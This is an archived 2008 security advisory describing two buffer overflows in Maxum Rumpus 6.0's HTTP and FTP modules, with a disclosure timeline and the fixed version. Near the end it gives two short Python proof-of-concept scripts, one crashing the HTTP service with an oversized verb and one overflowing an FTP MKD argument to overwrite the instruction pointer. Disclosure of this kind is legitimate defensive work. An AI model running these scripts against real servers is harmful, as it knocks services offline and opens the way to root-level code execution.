exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

BMSA-2008-09.txt

BMSA-2008-09.txt
Posted Dec 1, 2008
Authored by Nam Nguyen | Site bluemoon.com.vn

Rumpus version 6.0 contains two buffer overflow vulnerabilities in its HTTP and FTP modules. Exploitation details provided.

tags | exploit, web, overflow, vulnerability
SHA-256 | c697933035188180f88167e31ce965390ecc7b88b677ea14f9c0fd6e9def2553

BMSA-2008-09.txt

Change Mirror Download
BLUE MOON SECURITY ADVISORY 2008-09
===================================


:Title: Two buffer overflows in Maxum Rumpus
:Severity: Critical
:Reporter: Blue Moon Consulting
:Products: Maxum Rumpus v6.0
:Fixed in: 6.0.1


Description
-----------

Rumpus turns any Mac into a file transfer server.

Rumpus v6.0 contains two buffer overflow vulnerabilities in its HTTP and FTP modules. The first allows an unauthenticated user to crash Rumpus. The later may result in arbitrary code execution under superuser privilege.

The overflow in HTTP component is caused by the lack of boundary check when parsing for HTTP action verb (GET, POST, PUT, etc.). If the verb is exactly 2908-byte long, the server runs into a segmentation fault and crashes. A manual restart is required. It has been observed that this problem occurs at other verb lengths too. The vulnerability is rated at moderate severity for the lost of service.

The overflow in FTP component is also caused by the lack of length check when parsing FTP commands that take argument such as ``MKD``, ``XMKD``, ``RMD`` and so on. The overflow occurs when the argument is ``strcpy`` to an internal buffer. This buffer is 1024-byte long. When the passed-in argument is longer than 1046 bytes, the instruction pointer will be overwritten. This allows a successful attack to run arbitrary code under the privilege of a superuser (root) by default. Though authorization is required to exploit this security bug, the vulnerability is rated at critical severity because the FTP daemon could be allowing anonymous access.

Workaround
----------

There is no workaround the first bug.

Disable ANONYMOUS and only allow trusted users to use FTP.

Fix
---

Maxum has released Rumpus v6.0.1 which addressed these bugs.

Disclosure
----------

Blue Moon Consulting adapts `RFPolicy v2.0 <http://www.wiretrip.net/rfp/policy.html>`_ in notifying vendors.

:Initial vendor contact:

November 28, 2008: Initial contact sent to support@maxum.com

:Vendor response:

November 28, 2008: John requested further communications to be sent to the same address.

:Further communication:

November 28, 2008: Technical details and request for regular update of a patch sent to the vendor.

November 29, 2008: Vendor thanked for the bug report and planned to release v6.0.1 on Monday, December 01.

December 01, 2008: Vendor released 6.0.1 and posted release note at http://www.maxum.com/Rumpus/News601.html.

:Public disclosure: December 01, 2008

:Exploit code:

For the vulnerability in HTTP component::

from socket import socket, AF_INET, SOCK_STREAM

host = "192.168.1.12"
port = 80

s = socket(AF_INET, SOCK_STREAM)
s.connect((host, port))
s.send('z' * 2908 + '\n\n')
s.recv(1024)
s.close()

For the vulnerability in FTP component::

from socket import socket, AF_INET, SOCK_STREAM

host = "192.168.1.12"
port = 21
user = "regular"
pass_ = "training"

commands = [
'user regular\n',
'pass training\n',
'mkd ' + 'z' * 1046 + 'abcd\n'
]

s = socket(AF_INET, SOCK_STREAM)
s.connect((host, port))
s.recv(1024)
for line in commands:
s.send(line)
s.recv(1024)
s.close()

Disclaimer
----------

The information provided in this advisory is provided "as is" without warranty of any kind. Blue Moon Consulting Co., Ltd disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. Your use of the information on the advisory or materials linked from the advisory is at your own risk. Blue Moon Consulting Co., Ltd reserves the right to change or update this notice at any time.
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    0 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close